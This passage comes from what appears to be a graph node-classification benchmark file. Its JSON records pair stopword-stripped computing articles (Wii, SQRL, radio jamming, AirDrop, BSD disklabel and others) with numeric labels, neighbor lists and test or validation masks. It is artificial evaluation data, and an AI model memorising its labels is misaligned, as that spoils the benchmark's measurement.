gamecube backward compatibility mode wii runs variant ios specifically gamecube games mios contains modified version gamecube ipl system provides graphical interface wii abilities games run directly broadway processor either directly interface hardware hardware common wii gamecube interface ios running arm architecture processor wii-specific hardware arm processor access screen therefore neither ios means piece software running everything seen screen comes software operating system firmware therefore version number reported wii actually version number system menu updates result change version number system menu updated example ioses channels side effect means impossible nintendo implement functions would affect games example in-game system menu similar xbox 360 in-game dashboard playstation 3 in-game xmb wii menu known internally system menu name user interface wii game console first thing seen system boots similar many video game consoles wii games example possible install applications netflix stream media without requiring disc wii wii menu let users access game no-game functions built-in applications called channels designed represent television channels six primary channels disc channel mii channel photo channel wii shop channel forecast channel news channel although latter two initially included became available via system updates functions provided channels wii used limited computer full-featured web browser digital photo viewer users also use channels create share cartoon-like digital avatars called miis download new games channels directly wii shop channel new channels include example everybody votes channel internet channel separate channels graphically displayed grid navigated using pointer capability wii remote users also rearrange channels satisfied channels originally organized menu wii system supports wireless connectivity nintendo ds handheld console additional accessories connectivity allows players use nintendo ds microphone touch screen inputs wii games pokémon battle revolution first example nintendo given game using nintendo ds-wii connectivity nintendo later released nintendo channel wii allowing users download game demos additional data nintendo ds like many video game consoles wii console able connect internet although required wii system function wii unique 16-digit wii code use wii non-game features internet connection enabled users able access established nintendo wi-fi connection service wireless encryption wep wpa tkip/rc4 wpa2 ccmp/aes supported aoss support added system menu version 3.0 nintendo ds nintendo charge playing via service 12-digit friend code system controls players connect one another service features console including virtual console wiiconnect24 several channels wii console also communicate connect wii systems self-generated wireless lan enabling local wireless multiplayer different television sets system also implements console-based software including wii message board one connect internet third-party devices well wii console also includes web browser known internet channel version opera 9 browser menus meant convenient way access web television screen although far offering comfortable user interface compared modern internet browsers virtual keyboard pops needed input wii remote acts like mouse making possible click anywhere screen navigate though web links however browser always handle features normal web pages although support adobe flash thus capable playing flash games third-party services online bbc iplayer also available wii via internet channel browser although bbc iplayer later relaunched separate bbc iplayer channel wii addition internet access including internet channel system updates may restricted parental controls feature wii original designs nintendo wii console specifically wii models made pre-2011 fully backward compatible gamecube devices including game discs memory cards controllers wii hardware ports gamecube memory cards peripherals slot-loading drive able accept read previous console discs gamecube games work wii without additional configuration gamecube controller required play gamecube titles neither wii remote classic controller functions capacity wii supports progressive-scan output 480p-enabled gamecube titles peripherals connected via set four gamecube controller sockets two memory card slots concealed removable flip-open panels console retains connectivity game boy advance e-reader game boy advance cable used manner gamecube however feature accessed select gamecube titles previously utilized also limitations backward compatibility example online lan features certain gamecube games available since wii serial ports nintendo gamecube broadband adapter modem adapter wii uses proprietary port video output incompatible nintendo gamecube audio/video cables composite video s-video component video rgb scart console also lacks gamecube footprint high-speed port needed game boy player support furthermore gamecube functions available compatible memory cards controllers could used playing gamecube game due fact wii internal memory would save gamecube data original device backward compatibility earlier nintendo products players enjoy massive selection older games console addition hundreds newer wii game titles however south korean units lack gamecube backward compatibility also redesigned wii family edition wii mini launched 2011 2013 respectively compatibility stripped nevertheless another service called virtual console allow users download older games prior nintendo platforms namely nintendo entertainment system super nes nintendo 64 onto wii console well games non-nintendo platforms genesis turbografx-16 list new wii channels released beyond four initial channels i.e disc channel mii channel photo channel wii shop channel included original consoles news channel forecast channel released part system updates separate downloads required january 30 2019 channels listed discontinued exception wii fit channel internet channel list features included wii system updates list updates releases wii channels § released part system update separate download required gaming platforms nintendo gaming platforms next generation gaming platforms generation",
    "neighbors": [
      8584,
      10761,
      4364,
      1148,
      9640,
      684,
      4653,
      4908,
      2045,
      8262,
      2887,
      9033,
      6486,
      10329,
      10332,
      1501,
      6878,
      607,
      8937,
      9964,
      8700,
      3323,
      8316,
      8829
    ],
    "mask": "Test"
  },
  {
    "node_id": 1068,
    "label": 3,
    "text": "Virtual_DMA_Services:virtual dma services computing virtual dma services vds refer application programming interface allow dos win16 applications device drivers perform dma operations running protected virtual 8086 mode",
    "neighbors": [
      6730,
      1247
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1069,
    "label": 4,
    "text": "SQRL:sqrl sqrl pronounced squirrel secure quick reliable login formerly secure qr login draft open standard secure website login authentication software solution typically uses link scheme sqrl // optionally qr code user identifies via pseudonymous zero-knowledge proof rather providing user id password method thought impervious brute force password attack data breach shifts burden security away party requesting authentication closer operating system implementation possible hardware well user sqrl proposed steve gibson gibson research corporation october 2013 way simplify process authentication without risk revelation information transaction third party acronym sqrl coined steve gibson protocol drafted discussed analyzed in-depth community internet security enthusiasts news.grc.com newsgroups weekly podcast security october 2 2013 within two days airing podcast w3c google expressed interest working standard thesis sqrl analyzed found appears interesting approach terms envisioned user experience well underlying cryptography sqrl mostly combining well established cryptography novel way protocol answer problem identity fragmentation improves protocols oauth openid requiring third party broker transaction giving server secrets protect username password additionally provides standard freely used simplify login processes available password manager applications importantly standard open one company benefit owning technology according gibson website robust technology public domain security cryptography verified deliberately restricted commercial reasons sqrl design-inherent intentional phishing defenses mainly intended authentication anti-phishing despite anti-phishing properties protocol used website two components necessary implementation part web service implementation authenticates displays qr code specially crafted url according specifications protocol browser plugin mobile application read code order provide secure authentication sqrl client uses one-way functions user single master password decrypt secret master key generates combination site name comprising domain name optionally additional sub-site identifier example.com example.edu/chessclub sub- site-specific public/private key pair signs transaction tokens private key gives public key site verify encrypted data shared secrets compromise site could expose allow attacks accounts sites thing successful attacker could get public key would limited verifying signatures used site even though user unlocks master key single password never leaves sqrl client individual sites receive information sqrl process could used site number proof-of-concept implementations made various platforms including server php drupal c .net client android c .net java python also various server-end test debugging sites available sqrl currently used wickr single sign-on sso feature wickr pro steve gibson states sqrl open free solution unencumbered patents sqrl brought lot attention qr code based authentication mechanisms suggested protocol said patented earlier generally available royalty free use gibson says guys described patent completely different way sqrl operates would conflict sqrl patent superficially anything uses 2d code authentication seems similar ... superficially solutions details matter way sqrl operates entirely different details",
    "neighbors": [
      2945,
      1251,
      7556,
      3941,
      8644,
      10020,
      6750,
      8554,
      11051,
      5612,
      5677,
      7983,
      10801,
      5433,
      5435,
      3100,
      5918,
      6975
    ],
    "mask": "Test"
  },
  {
    "node_id": 1070,
    "label": 4,
    "text": "Radio_jamming:radio jamming radio jamming deliberate jamming blocking interference authorized wireless communications united states radio jamming devices known jammers illegal use result large fines cases jammers work transmission radio signals disrupt communications decreasing signal-to-noise ratio concept used wireless data networks disrupt information flow common form censorship totalitarian countries order prevent foreign radio stations border areas reaching country jamming usually distinguished interference occur due device malfunctions accidental circumstances devices simply cause interference regulated differently unintentional 'jamming occurs operator transmits busy frequency without first checking whether use without able hear stations using frequency another form unintentional jamming occurs equipment accidentally radiates signal cable television plant accidentally emits aircraft emergency frequency originally terms used interchangeably nowadays radio users use term jamming describe deliberate use radio noise signals attempt disrupt communications prevent listening broadcasts whereas term interference used describe unintentional forms disruption far common however distinction still universally applied inadvertent disruptions see electromagnetic compatibility intentional communications jamming usually aimed radio signals disrupt control battle transmitter tuned frequency opponents receiving equipment type modulation enough power override signal receiver digital wireless jamming signals bluetooth wifi possible low power common types form signal jamming random noise random pulse stepped tones warbler random keyed modulated cw tone rotary pulse spark recorded sounds gulls sweep-through divided two groups obvious subtle obvious jamming easy detect heard receiving equipment usually type noise stepped tones bagpipes random-keyed code pulses music often distorted erratically warbling tones highly distorted speech random noise hiss recorded sounds various combinations methods may used often accompanied regular morse identification signal enable individual transmitters identified order assess effectiveness example china used jamming extensively still plays loop traditional chinese music jamming channels cf attempted jamming numbers stations purpose type jamming block reception transmitted signals cause nuisance receiving operator one early soviet attempt jamming western broadcasters used noise diesel generator powering jamming transmitter subtle jamming jamming sound heard receiving equipment radio receive incoming signals yet everything seems superficially normal operator often technical attacks modern equipment squelch capture thanks fm capture effect frequency modulated broadcasts may jammed unnoticed simple unmodulated carrier receiver locks larger carrier signal hence ignore fm signal carries information digital signals use complex modulation techniques qpsk signals robust presence interfering signals signal relies hand shaking transmitter receiver identify determine security settings method high-level transmission jamming device sends initiation data packets receiver begin state machine establish two-way data transmission jammer loop back beginning instead completing handshake method jams receiver infinite loop keeps trying initiate connection never completes effectively blocks legitimate communication bluetooth consumer radio protocols wifi built-in detectors transmit channel free simple continuous transmission given channel continuously stop transmitter transmitting hence jamming receiver ever hearing intended transmitter jammers work analysing packet headers depending source destination selectively transmitting end message corrupting packet world war ii ground radio operators would attempt mislead pilots false instructions language precisely spoofing attack jamming radar jamming also important disrupt use radar used guide enemy missiles aircraft modern secure communication techniques use methods spread spectrum modulation resist deleterious effects jamming jamming foreign radio broadcast stations often used wartime periods tense international relations prevent deter citizens listening broadcasts enemy countries however jamming usually limited effectiveness affected stations usually change frequencies put additional frequencies and/or increase transmission power jamming also occasionally used governments germany ww2 israel cuba iraq iran iraq iran war 1980–1988 china north south korea several latin american countries well ireland pirate radio stations radio nova united kingdom government used two coordinated separately located transmitters jam offshore radio ship radio north sea international coast britain 1970 occupied europe nazis attempted jam broadcasts continent bbc allied stations along increasing transmitter power adding extra frequencies attempts made counteract jamming dropping leaflets cities instructing listeners construct directional loop aerial would enable hear stations jamming netherlands aerials nicknamed moffenzeef english kraut sieve much cold war soviet eastern bloc jamming western broadcasters led power race broadcasters jammers alike repeatedly increased transmission power utilised highly directional antennas added extra frequencies known barrage frequency diversity broadcasting already heavily overcrowded shortwave bands extent many broadcasters directly targeted jammers including pro-soviet stations suffered rising levels noise interference radio free europe sister service radio liberty main target soviet jammers followed voice america bbc world service stations targeted soviet jammers extent rfe/rl/voa/bbc included deutsche welle occasionally vatican radio kol yisrael radio canada international jamming usually took place programming languages widely spoken eastern bloc countries e.g. russian polish czech lithuanian etc. programmes english major western languages rarely ever jammed intentionally also periods china soviet union jammed programmes soviet union also jammed albanian programmes times parts world impacted broadcasting practices others meanwhile listeners soviet union eastern bloc devised ingenious methods homemade directional loop antennas hear western stations noise radio propagation shortwave difficult predict reliably listeners sometimes found days/times jamming particularly ineffective radio fading due atmospheric conditions affecting jamming signals favouring broadcasts phenomenon sometimes dubbed twilight immunity days course reverse case also times jamming transmitters temporarily air due breakdowns maintenance soviets eastern bloc allies used two types jamming transmitter skywave jamming covered large area reasons described limited effectiveness groundwave jamming effective small area thus used in/near major cities throughout eastern bloc types jamming less effective higher shortwave frequencies 15 mhz however many radios soviet union n't cover higher bands skywave jamming usually accompanied morse signals order enable coded identification jamming station order soviet monitoring posts could assess effectiveness station 1987 decades generally refusing acknowledge jamming even taking place soviets finally stopped jamming western broadcasts exception rfe/rl continued jammed several months 1988 previously periods individual eastern bloc countries refrained jamming western broadcasts varied widely time country general outside soviet union bulgaria one prolific operators jamming transmitters eastern bloc east germany least western governments may occasionally considered jamming broadcasts eastern bloc stations generally accepted would pointless exercise ownership shortwave radios less common western countries soviet union due vast physical size country many domestic stations relayed shortwave practical way cover remote areas additionally western governments generally less afraid intellectual competition eastern bloc francoist spain dictatorship jammed decades radio españa independiente radio station communist party spain broadcast moscow 1941–1955 bucharest 1955–1977 important pirate radio spain regime considered threat since allowed citizens skip censorship local media money technological assistance jamming came united states however latin america instances communist radio stations radio venceremos jammed allegedly cia short lived instances britain jammed egyptian suez crisis greek prior cyprus gaining independence rhodesian stations 2002 china acquired standard short-wave radio-broadcasting equipment designed general public radio-broadcasting technical support thales broadcast multimedia former subsidiary french state-owned company thales group debates raised iran regarding possible health hazards satellite jamming iranian officials including health minister claimed jamming health risk humans however minister communication recently admitted satellite jamming 'serious effects called identification jamming stations put stop practice government generally denied involvement jamming claimed sent unknown sources according sources irgc organization behind satellite jamming iran russian armed forces since summer 2015 begun using multi-functional ew weapon system ukraine known borisoglebsk 2 postulated system defeated communications parts country including mobile telephony gps systems",
    "neighbors": [
      6466,
      4163,
      3140,
      1317,
      615,
      7400,
      5020,
      11272,
      11695,
      3088,
      1169,
      6000,
      9233,
      10417,
      7541,
      6170,
      1692
    ],
    "mask": "Test"
  },
  {
    "node_id": 1071,
    "label": 6,
    "text": "BSD_disklabel:bsd disklabel bsd-derived computer operating systems including netbsd openbsd freebsd dragonfly bsd related operating systems sunos disklabel record stored data storage device hard disk contains information location partitions disk disklabels introduced 4.3bsd-tahoe release disklabels usually edited using disklabel utility later versions freebsd renamed bsdlabel traditionally disklabel first sector disk however system works operating systems access disk unix systems comprehend disklabels world ibm pc compatibles disks usually partitioned using pc bios master boot record mbr partition table scheme instead bsd partitioning scheme nested within single primary mbr partition extended partitioning scheme nested within single primary partition extended boot records sometimes particularly freebsd primary mbr partitions referred slices subdivisions primary mbr partition nested bsd partitioning scheme described disklabel called partitions bsd disklabel contained within volume boot record primary mbr partition mbr partition ids primary partitions subdivided using bsd disklabels a5h 386bsd freebsd a6h openbsd a9h netbsd 6ch dragonfly bsd format similar goal extended partitions logical partition system used ms-dos windows linux pc hard drive bsd disklabel partitions ms-dos type logical partitions separate primary partitions freebsd bsd operating systems access bsd disklabel subdivided partition ms-dos type extended/logical partitions bsd disklabels traditionally contain 8 entries describing partitions convention labeled alphabetically h bsd variants since increased 16 partitions labeled p also convention partitions b c fixed meanings",
    "neighbors": [
      1286,
      1927,
      10000,
      274,
      9625,
      1946,
      4636,
      2212,
      10535,
      11698,
      11573,
      1718,
      2744,
      5177,
      5819,
      9151,
      11459,
      10436,
      9671,
      1993,
      8266,
      8395,
      1361,
      850,
      7249,
      7383,
      10455,
      6361,
      9306,
      4571,
      6491,
      7521,
      1891,
      1637,
      998,
      4073,
      1515,
      2415,
      8816,
      2545,
      3058,
      6129,
      7027,
      2421,
      2550,
      9201,
      2424,
      1273,
      9844,
      2811,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 1072,
    "label": 0,
    "text": "Logic_form:logic form logic forms simple first-order logic knowledge representations natural language sentences formed conjunction concept predicates related shared arguments noun verb adjective adverb pronoun preposition conjunction generates predicate logic forms decorated word senses disambiguate semantics word two types predicates events marked e entities marked x shared arguments connect subjects objects verbs prepositions together example input/output might look like logic forms used natural language processing techniques question answering well inference database systems qa systems senseval-3 2004 introduced",
    "neighbors": [
      1890,
      7780,
      11538,
      2901,
      9879
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1073,
    "label": 2,
    "text": "Virtual_printer:virtual printer computing virtual printer simulated device whose user interface api resemble printer driver connected physical computer printer document printed virtual printer instead physically printing paper material underlying software processes images pages way often resulting file produced images transmitted early 1960s b5500 master control program mcp operating system included virtual printers called printer backups form printer backup tapes pbt printer backup disks pbd ibm vm/370 operating system allows users spool virtual printer punch file another user read input provides basic means file transfer typical uses virtual printers include",
    "neighbors": [
      2432,
      3974,
      1702,
      3916,
      10352,
      5714,
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 1074,
    "label": 2,
    "text": "AirDrop:airdrop airdrop ad-hoc service apple inc. ios macos operating systems introduced mac os x lion mac os x 10.7 ios 7 enables transfer files among supported macintosh computers ios devices wi-fi bluetooth without using mail mass storage device prior os x yosemite os x 10.10 os x lion mountain lion mavericks os x 10.7–10.9 respectively airdrop protocol macos different airdrop protocol ios two therefore interoperable os x yosemite later support ios airdrop protocol used transfers mac ios device well two 2012 newer mac computers uses wi-fi bluetooth restriction size file airdrop accommodate ios 7 later airdrop accessed either tapping settings general airdrop swiping home screen control center wi-fi bluetooth automatically switched airdrop enabled utilized options controlling airdrop discovery devices include ios 7 later application implements airdrop support available share button airdrop subject number restrictions ios inability share music videos native apps macs running macos 10.7 greater airdrop available finder window sidebar macs running os x 10.8.1 later also accessed menu option go → airdrop pressing ++ wi-fi must turned order airdrop recognize device device must also airdrop selected finder window sidebar able transfer files furthermore files automatically accepted receiving user must accept transfer done improve security privacy running ios 7 later airdrop enabled unofficially ipad 3rd generation although supported default airdrop enabled jailbreaking device installing airdrop enabler 7.0+ cydia procedure supported apple running mac os x lion 10.7 later transfer files mac iphone ipad ipod touch following minimum requirements met ios devices airdrop supported ios 8 later running os x yosemite 10.10 later bluetooth wi-fi turned mac ios devices devices required connected wi-fi network airdrop uses tls encryption direct apple-created peer-to-peer wi-fi connection transferring files wi-fi radios source target devices communicate directly without using internet connection wi-fi access point technical details airdrop proprietary peer-to-peer wi-fi protocol called apple wireless direct link awdl reverse engineered resulting open source implementations published owl opendrop numerous reported cases ios device users airdrop privacy set “ everyone ” received unwanted files nearby strangers phenomenon termed cyber-flashing users full ability control airdrop settings limit send files options everyone contacts",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      11289,
      6186,
      4139,
      6700,
      4657,
      8754,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      7857,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      9923,
      713,
      9418,
      3790,
      3286,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      7496,
      9035,
      1878,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      9109,
      3483,
      1439,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      8640,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1075,
    "label": 5,
    "text": "Alpine_(email_client):alpine email client alpine free software email client developed university washington alpine rewrite pine message system adds support unicode features alpine meant suitable inexperienced email users demanding power users alpine learned exploration use context-sensitive help user interface customized alpine shares many common features console applications like rich set shortcut keys using keyboard instead mouse navigation operations fact operations alpine corresponding shortcut keys unlike console applications targeting developers experienced users often require users edit configuration file alpine lets users change configuration options within software makes alpine one easy learn console-based email clients alpine supports imap pop smtp nntp ldap protocols natively although support composing html email display emails html content text alpine read write folders several formats including maildir mbox mh format used mh message handling system mbx mix alpine includes editor pico pico stands pine composer includes commands basic editing files search replace spelling justifying text besides cut paste intuitive navigation commands however editor used compose messages alpine using editor configuration variable besides able set alternate editor users configure hundred variables options liking including setting configuration sending receiving e-mail different services incoming folders collection use personalities called roles alpine therefore user share address book different accounts alpine also sort individual folders several criteria including threading original sender recipient size alpine also allows users configure colors filters scores character set display among others configuration address books saved locally remote imap server accessible wherever alpine also handles encrypted signed messages using s/mime standard although alpine designed accessible beginners easily set advanced users screens alpine include built-in help quickly accessed ctrl-g command alpine 1.0 publicly released december 20 2007 4 august 2008 uw alpine team announced one release incorporating web alpine 2.0 would shift effort direct development consultation coordination role help integrate contributions community taken mean uw longer maintains alpine left development others june 2009 project named re-alpine created sourceforge used upstream patches maintainers august 2013 re-alpine project official announced december 21 2012 release re-alpine 2.03 last official release since january 2013 eduardo chappa active software developer formerly university washington released newer versions alpine site announcement made public usenet newsgroup comp.mail.pine major unix-like systems currently use primary upstream site march 17 2017 chappa announced release version 2.21 latest stable released version 2.21.9 released september 19 2017 recent developmental version 2.21.99999 released june 22 2019 alpine officially stands alternatively licensed program internet news email uw also referred apache licensed pine alpine licensed apache license version 2 november 29 2006 saw first public alpha release december 20 2007 milestone new approach since alpha test pine always non-public",
    "neighbors": [
      1664,
      9986,
      3465,
      1297,
      3218,
      9747,
      5397,
      11418,
      9642,
      2101,
      9909,
      3015,
      10956,
      6231,
      7255,
      5988,
      9451,
      11500,
      10861,
      9459,
      3578,
      8443,
      7036,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1076,
    "label": 7,
    "text": "Data_Format_Description_Language:data format description language data format description language dfdl often pronounced daff-o-dil published open grid forum proposed recommendation january 2011 modeling language describing general text binary data standard way dfdl model schema allows text binary data read parsed native format presented instance information set information set logical representation data contents independent physical format example two records could different formats one fixed-length fields uses delimiters could contain exactly data would represented information set dfdl schema also allows data taken instance information set written serialized native format dfdl descriptive prescriptive dfdl data format impose use particular data format instead provides standard way describing many different kinds data format approach several advantages allows application author design appropriate data representation according requirements describing standard way shared enabling multiple programs directly interchange data dfdl achieves building upon facilities w3c xml schema 1.0 subset xml schema used enough enable modeling non-xml data motivations approach avoid inventing completely new schema language make easy convert general text binary data via dfdl information set corresponding xml document educational material available form dfdl tutorial videos several hands-on dfdl labs dfdl created response need grid apis able understand data regardless source language needed capable modeling wide variety existing text binary data formats working group established global grid forum later became open grid forum 2003 create specification language.. decision made early base language subset w3c xml schema using xs appinfo annotations carry extra information necessary describe non-xml physical representations established approach already used today commercial systems dfdl takes approach evolves open standard capable describing many text binary data formats work continued language resulting publication dfdl 1.0 specification ogf proposed recommendation gfd.174 january 2011 latest revision gfd.207 published november 2014 obsoletes gfd.174 incorporates issues noted date also available html summary dfdl features available ogf issues specification tracked using redmine issue trackers implementations dfdl processors parse serialize data using dfdl schemas available presentation available describes ibm dfdl daffodil public repository dfdl schemas describe commercial scientific data formats established github dfdl schemas formats like un/edifact nacha iso8583 available free download take example following text data stream gives name age location person logical model data described following fragment xml schema document order names types cardinality fields expressed xml schema model additionally model physical representation data stream dfdl augments xml schema fragment annotations xs element xs sequence objects follows property attributes dfdl annotations express data represented ascii text format fields variable length delimited commas alternative compact syntax also provided dfdl properties carried non-native attributes xml schema objects goal dfdl provide rich modeling language capable representing text binary data format 1.0 release major step towards goal capability includes support",
    "neighbors": [
      2688,
      11457,
      11332,
      10471,
      6483,
      7935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1077,
    "label": 2,
    "text": "Microsoft_Gadgets:microsoft gadgets microsoft gadgets lightweight single-purpose applications software widgets sit microsoft windows user computer desktop hosted web page according microsoft possible different types gadgets run different environments without modification currently case gadgets windows desktop sidebar hallmark feature windows vista windows 7 editions operating system subsequently microsoft deemed security vulnerabilities discontinued developing providing microsoft gadgets longer available time windows 8 10 rolled independent third party gadgets like rainmeter continue developed provided later versions windows microsoft gadgets also work windows xp service pack 3 needs alky applications web gadgets run web sites live.com windows live spaces live.com lets users add rss feeds order view news glance building microsoft start.com experimental page live.com customized web gadgets mini-applications serve almost purpose e.g mail readers weather reports slide shows search games etc. gadgets integrate windows live services including mail search favorites users create multiple site tabs customize different feeds gadgets layouts color schemes desktop gadgets desktop widgets small specialized applications generally designed simple tasks clocks calendars rss notifiers search tools also used control external applications windows media center panel sidebar found either right side default left side windows desktop windows vista operating system gadgets placed sidebar automatically aligned gadgets also placed elsewhere screen generally causes expand display information windows 7 sidebar removed although gadgets somewhat similarly aligned side screen gadgets toggled two sizes via button windows 7 windows sideshow new technology lets windows vista drive small auxiliary displays various form factors offering bite-size pieces information include displays embedded outside laptop lid detachable device enabling access information media even main system standby mode data also displayed cell phones network-connected devices via bluetooth connectivity options display updated number different kinds information contacts maps calendar email consulted mobile pc otherwise powered since underlying platform power-efficient run hundreds hours without draining notebook battery still providing always-on access data multimedia content sideshow coupled windows vista sidebar capability – sidebar gadgets easily ported compatible sideshow secondary display applications however hardware silicon providers also provide native capabilities allow richer multimedia applications text image audio video decode playback example notebook in-lid display could used mp3 player powered notebook battery providing hundreds hours playback time low power footprint sideshow platform maintains according microsoft gadgets discontinued serious vulnerabilities could exploited harm computer access computer files show objectionable content change behavior time attacker could even use gadget take complete control pc gadgets completely removed windows 8 however launch windows 10 widespread support gadgets led revival third-party enhancements new operating system adjusted take account including link gadgets sidebar windows control panel many hundreds available variety sources active development",
    "neighbors": [
      10243,
      9234,
      1043,
      540,
      1055,
      2083,
      8227,
      1577,
      1581,
      4143,
      9263,
      8246,
      1098,
      4178,
      9813,
      603,
      4704,
      617,
      5225,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      651,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      3283,
      214,
      9434,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      8455,
      6927,
      5401,
      5913,
      11546,
      4384,
      9505,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      6462,
      5952,
      1348,
      844,
      3922,
      11605,
      10079,
      11616,
      2943,
      3462,
      9609,
      10654,
      8607,
      6584,
      2493,
      7629,
      8161,
      6114,
      487,
      2027,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 1078,
    "label": 3,
    "text": "Google_MillWheel:google millwheel google millwheel data-processing framework developed google building low-latency applications",
    "neighbors": [
      5612,
      11343,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 1079,
    "label": 7,
    "text": "Cloud_Infrastructure_Management_Interface:cloud infrastructure management interface cloud infrastructure management interface cimi open standard api specification managing cloud infrastructure cimi goal enable users manage cloud infrastructure simple way standardizing interactions cloud environments achieve interoperable cloud infrastructure management service providers consumers developers cimi 1.1 registered international standard august 2014 joint technical committee 1 jtc 1 international organization standardization iso international electrotechnical commission iec cimi standard defined published distributed management task force dmtf includes cloud infrastructure management interface cimi model restful http-based protocol specification cimi xml schema cimi primer cimi uses cases whitepaper cimi aims provide single set interfaces cloud consumer use provision manage cloud infrastructure multiple clouds client code need adapted proprietary interfaces multiple vendors cimi described de jure standard change control standards body contrasting de facto standard typically one vendor change control interface everyone else reverse engineer inner workings expecting vendors embrace dual strategy delivering two offerings – one cimi compliant offering second proprietary offering allows proprietary functionality cimi scoped core iaas functionality deploying managing machines volumes networks monitoring systems group includes feature discovery mechanism find functions cloud provider supports including metadata describing capabilities resource constraints cimi model describes detail resources accessible cloud consumer maintained cloud provider relationships main entry point cimi consumer iaas provider cloud entry point data discovered iteratively model self-describing allows querying metadata e.g. discover extensions implemented model also extensible consumer provider model also defines serializations xml json resource cimi addresses management lifecycle infrastructure provided iaas provider creation deletion viewing alteration virtual machines networks storage start stop operations also defines resource operations creating machine images snapshots machines backup restore creation additional identical virtual machines cimi allows import ovf package create system machines cimi resources well export cimi system resources ovf package actual import export ovf packages handled underlying hypervisor management cimi implementation cimi currently supports rest architectural style using http interactions consumer providers mappings soap ws-man also considered protocol binding follows rest principles describes mapping http protocol verbs operations model request sent using http verb get post put delete includes message body either json xml format response uses standard http status code whose semantics interpreted context particular request made several adapters developed expose cimi api endpoint client applications consume translate api calls proprietary api calls supported target cloud provider following list cimi implementations cimi working group announced plug-fests improved interoperability cimi implementations",
    "neighbors": [
      10752,
      8854,
      6168,
      11036,
      5149,
      2206,
      9245,
      4771,
      5413,
      9766,
      10413,
      3502,
      11056,
      8627,
      3126,
      5816,
      6977,
      8904,
      1610,
      9290,
      8524,
      11344,
      2519,
      2904,
      4058,
      4064,
      4194,
      11235,
      8421,
      8426,
      5614,
      6511,
      1010,
      10486,
      3447,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 1080,
    "label": 2,
    "text": "Bitrig:bitrig bitrig openbsd-based operating system targeted exclusively amd64 armv7 platforms longer developed work done merged back openbsd achievements included porting fuse/puffs support libc++ platform replace libstdc++ pie support amd64 ndb kernel support bitrig focused using modern tools git llvm/clang along focusing modern platforms aimed commercially friendly code base texinfo gnu tool base system gpt partitioning supported bitrig future plans included support virtualisation efi",
    "neighbors": [
      7552,
      5506,
      2179,
      1927,
      4745,
      10761,
      2061,
      9743,
      8725,
      5534,
      1316,
      684,
      4908,
      1839,
      1718,
      10422,
      7483,
      9151,
      9153,
      3651,
      10436,
      9671,
      9927,
      5067,
      8395,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      873,
      9452,
      5363,
      633,
      8316
    ],
    "mask": "Test"
  },
  {
    "node_id": 1081,
    "label": 5,
    "text": "Host_model:host model computer networking host model option designing tcp/ip stack networking operating system like microsoft windows linux unicast packet arrives host ip must determine whether packet locally destined destination matches address assigned interface host ip stack implemented weak host model accepts locally destined packet regardless network interface packet received ip stack implemented strong host model accepts locally destined packets destination ip address packet matches ip address assigned network interface packet received weak host model provides better network connectivity example easy find packet arriving host using ordinary tools also makes hosts susceptible multihome-based network attacks strong host model provides better security ipv4 implementation microsoft windows versions prior windows vista uses weak host model windows vista windows server 2008 tcp/ip stack supports strong host model ipv4 ipv6 configured use default however also configured use weak host model ipv4 implementation linux defaults weak host model source validation reversed path specified rfc 1812 enabled rp_filter option distributions default quite strong host model defends class attacks typical multihomed hosts arp_ignore arp_announce also used tweak behaviour bsd defaults strong host model",
    "neighbors": [
      5472,
      8391,
      5225,
      2221,
      6797,
      7983,
      823,
      5531,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 1082,
    "label": 1,
    "text": "Database-as-IPC:database-as-ipc computer programming database-as-ipc anti-pattern database used message queue routine interprocess communication situation lightweight ipc mechanism sockets would suitable british computer scientist junade ali defined database-as-ipc anti-pattern using database schedule jobs queue tasks completed noting anti-pattern centres around using database temporary messages instead persistent data using database kind message passing extremely inefficient compared ipc methods often introduces serious long-term maintenance issues method enjoys measure popularity database operations widely understood proper ipc mechanisms",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1083,
    "label": 7,
